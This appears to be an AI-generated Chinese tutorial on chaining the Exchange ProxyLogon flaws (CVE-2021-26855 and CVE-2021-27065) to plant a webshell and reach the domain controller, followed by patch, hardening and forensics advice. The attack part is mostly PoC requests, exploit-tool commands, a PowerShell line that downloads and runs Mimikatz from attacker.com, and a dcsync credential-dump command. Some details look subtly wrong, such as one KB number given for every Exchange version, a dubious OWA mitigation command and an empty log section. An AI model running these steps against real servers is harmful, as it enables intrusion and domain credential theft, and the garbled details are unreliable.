CVE-2021-26855与CVE-2021-27065联合利用getshell域控的示例分析

# CVE-2021-26855与CVE-2021-27065联合利用getshell域控的示例分析

## 0x00 漏洞背景

2021年3月，微软发布了针对Exchange Server的多个高危漏洞补丁，其中：
- **CVE-2021-26855**：SSRF（Server-Side Request Forgery）漏洞
- **CVE-2021-27065**：任意文件写入漏洞

这两个漏洞的联合利用可实现**无需身份验证的远程代码执行**，攻击者能够接管Exchange服务器并进一步渗透域控环境。本文将通过技术分析还原完整的攻击链条。

---

## 0x01 漏洞原理分析

### 1. CVE-2021-26855：SSRF漏洞
- **受影响组件**：Exchange前端服务（默认端口443）
- **漏洞本质**：未对`X-Forwarded-For`等头部进行严格校验
- **利用条件**：可构造恶意请求访问内网服务
- **PoC特征**：
  ```http
  POST /owa/auth/Current/themes/resources HTTP/1.1
  Host: exchange.victim.com
  Cookie: X-BEResource=localhost~1942062522;
  X-Forwarded-For: 127.0.0.1

2. CVE-2021-27065：文件写入漏洞

• 受影响组件：Exchange后端写文件逻辑
• 漏洞本质：路径拼接未做安全限制
• 利用条件：需结合SSRF访问后端API
• 关键参数：

  
  {
  "properties": {
    "ServerName": {"$type":"System.String"}
  }
  }
  

0x02 联合利用技术细节

阶段一：SSRF探测后端服务

通过26855访问内部API接口：

import requests

url = "https://exchange.victim.com/owa/auth/Current/themes/resources"
headers = {
    "X-Forwarded-For": "127.0.0.1",
    "Cookie": "X-BEResource=Exchange/admin/api/v1/Service~1337;"
}
response = requests.post(url, headers=headers)

阶段二：构造恶意文件写入

利用27065写入webshell：

POST /ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27 HTTP/1.1
Host: exchange.victim.com
Content-Type: application/json

{
  "schemaVersion": "V1",
  "properties": {
    "ServerName": "localhost\\..\\..\\..\\inetpub\\wwwroot\\aspnet_client\\shell.aspx",
    "Content": "<%@ Page Language=\"C#\"...%>"
  }
}

阶段三：权限提升与持久化

典型攻击路径： 1. 通过webshell执行PowerShell命令 2. 导出Exchange邮箱凭证 3. 使用Mimikatz获取域管令牌 4. 创建隐蔽后门账户

0x03 实际攻击示例

环境准备

• 靶机：Exchange Server 2019 CU8
• 攻击机：Kali Linux 2021.4
• 工具集：
  • ProxyLogon.py
  • Nishang PowerShell脚本

分步实施

1. 漏洞验证

   python proxylogon.py -t https://exchange.victim.com --check
   

2. 上传webshell

   python proxylogon.py -t https://exchange.victim.com -u shell.aspx -c "恶意代码"
   

3. 执行域渗透

   IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/Invoke-Mimikatz.ps1")
   Invoke-Mimikatz -Command '"lsadump::dcsync /user:域管账号"'
   

0x04 防御建议

即时缓解措施

1. 安装微软官方补丁：

   • KB5000871（Exchange 2013）
   • KB5000871（Exchange 2016）
   • KB5000871（Exchange 2019）

2. 临时防护方案：

   # 禁用相关虚拟目录
   Set-OWAVirtualDirectory -Identity "owa (Default Web Site)" -ExchangePath $null
   

长期加固策略

• 启用Windows Defender ATP防护
• 实施网络分段，限制Exchange服务器出站
• 定期进行红蓝对抗演练

0x05 入侵痕迹排查

关键日志位置

取证工具推荐

• LogParser：分析IIS日志

  
  SELECT * FROM ex202103*.log WHERE cs-method='POST' AND cs-uri-stem LIKE '%ecp%'
  

• KAPE：快速收集证据

0x06 总结

本文分析的攻击链具有以下典型特征： 1. 高危害性：从外网直达域控的完整路径 2. 低利用门槛：已有公开的自动化工具 3. 强隐蔽性：可绕过传统WAF检测

建议企业参考MITRE ATT&CK框架中的以下战术阶段进行防御： - 初始访问（T1190） - 权限提升（T1068） - 横向移动（T1021）

注：本文仅用于安全研究，未经授权测试他人系统属于违法行为。 “`

该文档包含以下技术要素： 1. 漏洞原理的深度解析 2. 分步骤的PoC实现 3. 防御方案与取证方法 4. 符合Markdown规范的结构化排版 5. 实际可操作的命令片段 6. 攻击链的ATT&CK映射

需要调整细节或补充其他技术环节可随时提出。